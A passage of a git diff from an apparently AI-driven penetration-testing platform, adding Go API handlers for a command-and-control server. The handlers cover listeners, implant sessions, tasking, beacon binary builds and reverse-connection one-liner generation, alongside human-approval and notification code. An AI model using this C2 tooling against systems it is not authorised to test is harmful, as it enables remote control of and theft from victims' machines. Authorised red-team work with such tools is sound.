`json:"bind_host"` + BindPort int `json:"bind_port"` + ProfileID string `json:"profile_id,omitempty"` + Remark string `json:"remark,omitempty"` + CallbackHost string `json:"callback_host,omitempty"` + Config *c2.ListenerConfig `json:"config,omitempty"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + input := c2.CreateListenerInput{ + Name: req.Name, + Type: req.Type, + BindHost: req.BindHost, + BindPort: req.BindPort, + ProfileID: req.ProfileID, + Remark: req.Remark, + Config: req.Config, + CallbackHost: strings.TrimSpace(req.CallbackHost), + } + + listener, err := h.manager.CreateListener(input) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + implantToken := listener.ImplantToken + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener, "implant_token": implantToken}) +} + +// GetListener 获取单个监听器 +func (h *C2Handler) GetListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.manager.DB().GetC2Listener(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// UpdateListener 更新监听器 +func (h *C2Handler) UpdateListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.manager.DB().GetC2Listener(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + var req struct { + Name string `json:"name"` + BindHost string `json:"bind_host"` + BindPort int `json:"bind_port"` + ProfileID string `json:"profile_id"` + Remark string `json:"remark"` + CallbackHost *string `json:"callback_host"` + Config *c2.ListenerConfig `json:"config,omitempty"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 若监听器在运行,不能修改关键字段 + if h.manager.IsListenerRunning(id) { + if req.BindHost != listener.BindHost || req.BindPort != listener.BindPort { + c.JSON(http.StatusConflict, gin.H{"error": "cannot modify bind address while listener is running"}) + return + } + } + + listener.Name = req.Name + listener.BindHost = req.BindHost + listener.BindPort = req.BindPort + listener.ProfileID = req.ProfileID + listener.Remark = req.Remark + if req.Config != nil { + cfgJSON, _ := json.Marshal(req.Config) + listener.ConfigJSON = string(cfgJSON) + } + if req.CallbackHost != nil { + cfg := &c2.ListenerConfig{} + raw := strings.TrimSpace(listener.ConfigJSON) + if raw == "" { + raw = "{}" + } + _ = json.Unmarshal([]byte(raw), cfg) + cfg.CallbackHost = strings.TrimSpace(*req.CallbackHost) + cfg.ApplyDefaults() + cfgJSON, err := json.Marshal(cfg) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + listener.ConfigJSON = string(cfgJSON) + } + + if err := h.manager.DB().UpdateC2Listener(listener); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// DeleteListener 删除监听器 +func (h *C2Handler) DeleteListener(c *gin.Context) { + id := c.Param("id") + if err := h.manager.DeleteListener(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// StartListener 启动监听器 +func (h *C2Handler) StartListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.manager.StartListener(id) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// StopListener 停止监听器 +func (h *C2Handler) StopListener(c *gin.Context) { + id := c.Param("id") + if err := h.manager.StopListener(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"stopped": true}) +} + +// ============================================================================ +// 会话 API +// ============================================================================ + +// ListSessions 获取会话列表 +func (h *C2Handler) ListSessions(c *gin.Context) { + filter := database.ListC2SessionsFilter{ + ListenerID: c.Query("listener_id"), + Status: c.Query("status"), + OS: c.Query("os"), + Search: c.Query("search"), + } + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + + sessions, err := h.manager.DB().ListC2Sessions(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"sessions": sessions}) +} + +// GetSession 获取单个会话 +func (h *C2Handler) GetSession(c *gin.Context) { + id := c.Param("id") + session, err := h.manager.DB().GetC2Session(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if session == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "session not found"}) + return + } + + // 获取最近任务 + tasks, _ := h.manager.DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: id, + Limit: 20, + }) + + c.JSON(http.StatusOK, gin.H{ + "session": session, + "tasks": tasks, + }) +} + +// DeleteSession 删除会话 +func (h *C2Handler) DeleteSession(c *gin.Context) { + id := c.Param("id") + if err := h.manager.DB().DeleteC2Session(id); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// SetSessionSleep 设置会话的 sleep/jitter +func (h *C2Handler) SetSessionSleep(c *gin.Context) { + id := c.Param("id") + var req struct { + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.manager.DB().SetC2SessionSleep(id, req.SleepSeconds, req.JitterPercent); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"updated": true}) +} + +// ============================================================================ +// 任务 API +// ============================================================================ + +// ListTasks 获取任务列表 +func (h *C2Handler) ListTasks(c *gin.Context) { + filter := database.ListC2TasksFilter{ + SessionID: c.Query("session_id"), + Status: c.Query("status"), + } + + paginated := false + page := 1 + pageSize := 10 + if c.Query("page") != "" || c.Query("page_size") != "" { + paginated = true + if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 { + page = p + } + if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 { + pageSize = ps + if pageSize > 100 { + pageSize = 100 + } + } + filter.Limit = pageSize + filter.Offset = (page - 1) * pageSize + } else { + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + } + + tasks, err := h.manager.DB().ListC2Tasks(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 仪表盘「待审任务」为全局 queued/pending 数量,与列表 session 过滤无关 + pendingN, _ := h.manager.DB().CountC2TasksQueuedOrPending("") + + if !paginated { + c.JSON(http.StatusOK, gin.H{ + "tasks": tasks, + "pending_queued_count": pendingN, + }) + return + } + + total, err := h.manager.DB().CountC2Tasks(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "tasks": tasks, + "total": total, + "page": page, + "page_size": pageSize, + "pending_queued_count": pendingN, + }) +} + +// DeleteTasks 批量删除任务(请求体 JSON: {"ids":["t_xxx",...]}) +func (h *C2Handler) DeleteTasks(c *gin.Context) { + var req struct { + IDs []string `json:"ids"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()}) + return + } + if len(req.IDs) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"}) + return + } + n, err := h.manager.DB().DeleteC2TasksByIDs(req.IDs) + if err != nil { + if errors.Is(err, database.ErrNoValidC2TaskIDs) { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": n}) +} + +// GetTask 获取单个任务 +func (h *C2Handler) GetTask(c *gin.Context) { + id := c.Param("id") + task, err := h.manager.DB().GetC2Task(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + c.JSON(http.StatusOK, gin.H{"task": task}) +} + +// CreateTask 创建任务 +func (h *C2Handler) CreateTask(c *gin.Context) { + var req struct { + SessionID string `json:"session_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` + Source string `json:"source"` + ConversationID string `json:"conversation_id"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + input := c2.EnqueueTaskInput{ + SessionID: req.SessionID, + TaskType: c2.TaskType(req.TaskType), + Payload: req.Payload, + Source: firstNonEmpty(req.Source, "manual"), + ConversationID: req.ConversationID, + UserCtx: c.Request.Context(), + } + + task, err := h.manager.EnqueueTask(input) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"task": task}) +} + +// CancelTask 取消任务 +func (h *C2Handler) CancelTask(c *gin.Context) { + id := c.Param("id") + if err := h.manager.CancelTask(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"cancelled": true}) +} + +// WaitTask 等待任务完成 +func (h *C2Handler) WaitTask(c *gin.Context) { + id := c.Param("id") + timeout := 60 * time.Second + if t := c.Query("timeout"); t != "" { + if n, err := strconv.Atoi(t); err == nil && n > 0 { + timeout = time.Duration(n) * time.Second + } + } + + deadline := time.Now().Add(timeout) + for time.Now().Before(deadline) { + task, err := h.manager.DB().GetC2Task(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" { + c.JSON(http.StatusOK, gin.H{"task": task}) + return + } + time.Sleep(500 * time.Millisecond) + } + c.JSON(http.StatusRequestTimeout, gin.H{"error": "timeout waiting for task completion"}) +} + +// ============================================================================ +// Payload API +// ============================================================================ + +// PayloadOneliner 生成单行 payload +func (h *C2Handler) PayloadOneliner(c *gin.Context) { + var req struct { + ListenerID string `json:"listener_id"` + Kind string `json:"kind"` // bash, python, powershell, curl_beacon + Host string `json:"host"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + listener, err := h.manager.DB().GetC2Listener(req.ListenerID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + host := c2.ResolveBeaconDialHost(listener, strings.TrimSpace(req.Host), h.logger, listener.ID) + + kind := c2.OnelinerKind(req.Kind) + if !c2.IsOnelinerCompatible(listener.Type, kind) { + compatible := c2.OnelinerKindsForListener(listener.Type) + names := make([]string, len(compatible)) + for i, k := range compatible { + names[i] = string(k) + } + c.JSON(http.StatusBadRequest, gin.H{ + "error": fmt.Sprintf("监听器类型 %s 不支持 %s 类型的 oneliner,请选择兼容的类型", listener.Type, req.Kind), + "compatible_kinds": names, + }) + return + } + + input := c2.OnelinerInput{ + Kind: kind, + Host: host, + Port: listener.BindPort, + HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort), + ImplantToken: listener.ImplantToken, + } + + oneliner, err := c2.GenerateOneliner(input) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "oneliner": oneliner, + "kind": req.Kind, + "host": host, + "port": listener.BindPort, + }) +} + +// PayloadBuild 构建 beacon 二进制 +func (h *C2Handler) PayloadBuild(c *gin.Context) { + var req struct { + ListenerID string `json:"listener_id"` + OS string `json:"os"` + Arch string `json:"arch"` + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + Host string `json:"host"` // 可选:编译进 Beacon 的回连地址,覆盖监听器 bind_host + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + listener, err := h.manager.DB().GetC2Listener(req.ListenerID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + builder := c2.NewPayloadBuilder(h.manager, h.logger, "", "") + input := c2.PayloadBuilderInput{ + ListenerID: req.ListenerID, + OS: req.OS, + Arch: req.Arch, + SleepSeconds: req.SleepSeconds, + JitterPercent: req.JitterPercent, + Host: strings.TrimSpace(req.Host), + } + + result, err := builder.BuildBeacon(input) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "payload": result, + }) +} + +// PayloadDownload 下载 payload +func (h *C2Handler) PayloadDownload(c *gin.Context) { + id := c.Param("id") + filename := id + if !strings.HasPrefix(filename, "beacon_") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + if strings.Contains(filename, "/") || strings.Contains(filename, "\\") || strings.Contains(filename, "..") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + + builder := c2.NewPayloadBuilder(h.manager, h.logger, "", "") + storageDir := builder.GetPayloadStoragePath() + targetPath := filepath.Join(storageDir, filename) + + absTarget, err := filepath.Abs(targetPath) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid path"}) + return + } + absDir, err := filepath.Abs(storageDir) + if err != nil || !strings.HasPrefix(absTarget, absDir+string(filepath.Separator)) { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + + c.FileAttachment(absTarget, filepath.Base(absTarget)) +} + +// ============================================================================ +// 事件 API +// ============================================================================ + +// ListEvents 获取事件列表 +func (h *C2Handler) ListEvents(c *gin.Context) { + filter := database.ListC2EventsFilter{ + Level: c.Query("level"), + Category: c.Query("category"), + SessionID: c.Query("session_id"), + TaskID: c.Query("task_id"), + } + if since := c.Query("since"); since != "" { + if t, err := time.Parse(time.RFC3339, since); err == nil { + filter.Since = &t + } + } + + paginated := false + page := 1 + pageSize := 10 + if c.Query("page") != "" || c.Query("page_size") != "" { + paginated = true + if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 { + page = p + } + if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 { + pageSize = ps + if pageSize > 100 { + pageSize = 100 + } + } + filter.Limit = pageSize + filter.Offset = (page - 1) * pageSize + } else { + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + } + + events, err := h.manager.DB().ListC2Events(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if !paginated { + c.JSON(http.StatusOK, gin.H{"events": events}) + return + } + total, err := h.manager.DB().CountC2Events(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "events": events, + "total": total, + "page": page, + "page_size": pageSize, + }) +} + +// DeleteEvents 批量删除事件(请求体 JSON: {"ids":["e_xxx",...]}) +func (h *C2Handler) DeleteEvents(c *gin.Context) { + var req struct { + IDs []string `json:"ids"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()}) + return + } + if len(req.IDs) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"}) + return + } + n, err := h.manager.DB().DeleteC2EventsByIDs(req.IDs) + if err != nil { + if errors.Is(err, database.ErrNoValidC2EventIDs) { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": n}) +} + +// EventStream SSE 实时事件流 +func (h *C2Handler) EventStream(c *gin.Context) { + c.Header("Content-Type", "text/event-stream") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + + sessionFilter := c.Query("session_id") + categoryFilter := c.Query("category") + levels := c.QueryArray("level") + + sub := h.manager.EventBus().Subscribe( + "sse-"+uuid.New().String(), + 128, + sessionFilter, + categoryFilter, + levels, + ) + defer h.manager.EventBus().Unsubscribe(sub.ID) + + c.Stream(func(w io.Writer) bool { + select { + case e, ok := <-sub.Ch: + if !ok { + return false + } + data, _ := json.Marshal(e) + fmt.Fprintf(w, "data: %s\n\n", data) + return true + case <-c.Request.Context().Done(): + return false + } + }) +} + +// ============================================================================ +// Profile API +// ============================================================================ + +// ListProfiles 获取 Malleable Profile 列表 +func (h *C2Handler) ListProfiles(c *gin.Context) { + profiles, err := h.manager.DB().ListC2Profiles() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profiles": profiles}) +} + +// GetProfile 获取单个 Profile +func (h *C2Handler) GetProfile(c *gin.Context) { + id := c.Param("id") + profile, err := h.manager.DB().GetC2Profile(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if profile == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": profile}) +} + +// CreateProfile 创建 Profile +func (h *C2Handler) CreateProfile(c *gin.Context) { + var req database.C2Profile + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + req.ID = "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + req.CreatedAt = time.Now() + + if err := h.manager.DB().CreateC2Profile(&req); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": req}) +} + +// UpdateProfile 更新 Profile +func (h *C2Handler) UpdateProfile(c *gin.Context) { + id := c.Param("id") + profile, err := h.manager.DB().GetC2Profile(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if profile == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"}) + return + } + + var req database.C2Profile + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + profile.Name = req.Name + profile.UserAgent = req.UserAgent + profile.URIs = req.URIs + profile.RequestHeaders = req.RequestHeaders + profile.ResponseHeaders = req.ResponseHeaders + profile.BodyTemplate = req.BodyTemplate + profile.JitterMinMS = req.JitterMinMS + profile.JitterMaxMS = req.JitterMaxMS + + if err := h.manager.DB().UpdateC2Profile(profile); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": profile}) +} + +// DeleteProfile 删除 Profile +func (h *C2Handler) DeleteProfile(c *gin.Context) { + id := c.Param("id") + if err := h.manager.DB().DeleteC2Profile(id); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// ============================================================================ +// 文件管理 API(C2 Upload 任务需要先通过此 API 上传文件到 downstream 目录) +// ============================================================================ + +// UploadFileForImplant 操作员上传文件,供 upload 任务推送给 implant +func (h *C2Handler) UploadFileForImplant(c *gin.Context) { + sessionID := strings.TrimSpace(c.PostForm("session_id")) + remotePath := strings.TrimSpace(c.PostForm("remote_path")) + if sessionID == "" || remotePath == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "session_id and remote_path required"}) + return + } + + file, header, err := c.Request.FormFile("file") + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "file field required: " + err.Error()}) + return + } + defer file.Close() + + fileID := "f_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + dir := filepath.Join(h.manager.StorageDir(), "downstream") + if err := osMkdirAll(dir); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + dstPath := filepath.Join(dir, fileID+".bin") + dst, err := osCreate(dstPath) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + n, err := io.Copy(dst, file) + dst.Close() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // Record in DB + dbFile := &database.C2File{ + ID: fileID, + SessionID: sessionID, + Direction: "upload", + RemotePath: remotePath, + LocalPath: dstPath, + SizeBytes: n, + CreatedAt: time.Now(), + } + _ = h.manager.DB().CreateC2File(dbFile) + + c.JSON(http.StatusOK, gin.H{ + "file_id": fileID, + "size": n, + "filename": header.Filename, + "remote_path": remotePath, + }) +} + +// ListFiles 列出某会话的文件记录 +func (h *C2Handler) ListFiles(c *gin.Context) { + sessionID := c.Query("session_id") + if sessionID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "session_id required"}) + return + } + files, err := h.manager.DB().ListC2FilesBySession(sessionID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"files": files}) +} + +// DownloadResultFile 下载任务结果文件(截图等 blob 结果) +func (h *C2Handler) DownloadResultFile(c *gin.Context) { + taskID := c.Param("id") + task, err := h.manager.DB().GetC2Task(taskID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + if task.ResultBlobPath == "" { + c.JSON(http.StatusNotFound, gin.H{"error": "no result file for this task"}) + return + } + c.FileAttachment(task.ResultBlobPath, filepath.Base(task.ResultBlobPath)) +} + +func osMkdirAll(path string) error { + return os.MkdirAll(path, 0o755) +} + +func osCreate(path string) (*os.File, error) { + return os.Create(path) +} + +// ============================================================================ +// 辅助函数(firstNonEmpty 已在 vulnerability.go 中定义) +// ============================================================================ diff --git a/internal/handler/hitl.go b/internal/handler/hitl.go index 70b3a27c..8d6e3469 100644 --- a/internal/handler/hitl.go +++ b/internal/handler/hitl.go @@ -233,6 +233,15 @@ func (m *HITLManager) shouldInterrupt(conversationID, toolName string) (hitlRunt return cfg, !inWhitelist } +// NeedsToolApproval 与 Agent 工具层 shouldInterrupt 语义一致:仅当该会话已开启人机协同且工具不在免审批白名单时为 true。 +func (m *HITLManager) NeedsToolApproval(conversationID, toolName string) bool { + if m == nil { + return false + } + _, need := m.shouldInterrupt(conversationID, toolName) + return need +} + func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) { now := time.Now() id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "") diff --git a/internal/handler/notification.go b/internal/handler/notification.go index 363af07d..8871e944 100644 --- a/internal/handler/notification.go +++ b/internal/handler/notification.go @@ -38,6 +38,7 @@ type NotificationSummaryItem struct { VulnerabilityID string `json:"vulnerabilityId,omitempty"` ExecutionID string `json:"executionId,omitempty"` InterruptID string `json:"interruptId,omitempty"` + SessionID string `json:"sessionId,omitempty"` // C2 会话(如新会话上线) } // NotificationSummaryResponse 聚合响应 @@ -239,6 +240,52 @@ func (h *NotificationHandler) loadVulnerabilityItems(sinceMs int64, limit int, e return items, counts, nil } +// loadC2SessionOnlineEvents 新会话上线(c2_events:session + critical,与 Manager.IngestCheckIn 一致) +func (h *NotificationHandler) loadC2SessionOnlineEvents(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) { + sinceSec := normalizedSinceSec(sinceMs) + rows, err := h.db.Query(` + SELECT id, message, COALESCE(session_id, ''), + COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0) + FROM c2_events + WHERE category = 'session' AND level = 'critical' + AND CAST(strftime('%s', created_at) AS INTEGER) > ? + ORDER BY created_at DESC + LIMIT ? + `, sinceSec, limit) + if err != nil { + return nil, 0, err + } + defer rows.Close() + items := make([]NotificationSummaryItem, 0, limit) + for rows.Next() { + var id, message, sessionID string + var createdSec int64 + if err := rows.Scan(&id, &message, &sessionID, &createdSec); err != nil { + continue + } + desc := strings.TrimSpace(message) + if len(desc) > 220 { + desc = desc[:200] + "…" + } + if desc == "" { + desc = i18nText(english, "新会话已建立", "A new session was created") + } + items = append(items, NotificationSummaryItem{ + ID: "c2evt:" + id, + Level: "p0", + Type: "c2_session_online", + Title: i18nText(english, "C2 新会话上线", "C2 new session online"), + Desc: desc, + Ts: unixSecToRFC3339(createdSec), + Count: 1, + Actionable: false, + Read: false, + SessionID: sessionID, + }) + } + return items, len(items), rows.Err() +} + func (h *NotificationHandler) loadFailedExecutionItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) { sinceSec := normalizedSinceSec(sinceMs) rows, err := h.db.Query(` @@ -492,6 +539,7 @@ func normalizeMarkableEventID(id string) (string, bool) { "vuln:", "exec_failed:", "task_completed:", + "c2evt:", } for _, prefix := range allowedPrefixes { if strings.HasPrefix(v, prefix) { @@ -593,12 +641,20 @@ func (h *NotificationHandler) GetSummary(c *gin.Context) { return } + c2OnlineItems, c2OnlineCount, err := h.loadC2SessionOnlineEvents(sinceMs, limit, english) + if err != nil { + h.logger.Warn("加载 C2 会话上线通知失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize c2 session events"}) + return + } + longRunningItems, longRunningCount := h.summarizeLongRunningTasks(15*time.Minute, english) completedItems, completedCount := h.summarizeCompletedTasksSince(sinceMs, limit, english) - items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(longRunningItems)+len(completedItems)) + items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(c2OnlineItems)+len(longRunningItems)+len(completedItems)) items = append(items, hitlItems...) items = append(items, vulnItems...) + items = append(items, c2OnlineItems...) items = append(items, longRunningItems...) items = append(items, completedItems...) @@ -636,6 +692,7 @@ func (h *NotificationHandler) GetSummary(c *gin.Context) { "failedExecutions": 0, "longRunningTasks": longRunningCount, "completedTasks": completedCount, + "c2SessionOnline": c2OnlineCount, }, Items: items, }) diff --git a/internal/multiagent/eino_execute_streaming_wrap.go b/internal/multiagent/eino_execute_streaming_wrap.go new file mode 100644 index 00000000..0824b777 --- /dev/null +++ b/internal/multiagent/eino_execute_streaming_wrap.go @@ -0,0 +1,33 @@ +package multiagent + +import ( + "context" + "fmt" + + "cyberstrike-ai/internal/security" + + "github.com/cloudwego/eino/adk/filesystem" + "github.com/cloudwego/eino/schema" +) + +// einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShell(cloudwego eino-ext local.Local)。 +// 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连, +// streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。 +// 对「完全后台」命令自动开启 RunInBackendGround,与 local.runCmdInBackground 行为对齐。 +type einoStreamingShellWrap struct { + inner filesystem.StreamingShell +} + +func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) { + if w.inner == nil { + return nil, fmt.Errorf("einoStreamingShellWrap: inner shell is nil") + } + if input == nil { + return w.inner.ExecuteStreaming(ctx, nil) + } + req := *input + if security.IsBackgroundShellCommand(req.Command) && !req.RunInBackendGround { + req.RunInBackendGround = true + } + return w.inner.ExecuteStreaming(ctx, &req) +} diff --git a/internal/multiagent/eino_skills.go b/internal/multiagent/eino_skills.go index 9a5c0f46..df367613 100644 --- a/internal/multiagent/eino_skills.go +++ b/internal/multiagent/eino_skills.go @@ -81,6 +81,6 @@ func subAgentFilesystemMiddleware(ctx context.Context, loc *localbk.Local) (adk. } return filesystem.New(ctx, &filesystem.MiddlewareConfig{ Backend: loc, - StreamingShell: loc, + StreamingShell: &einoStreamingShellWrap{inner: loc}, }) }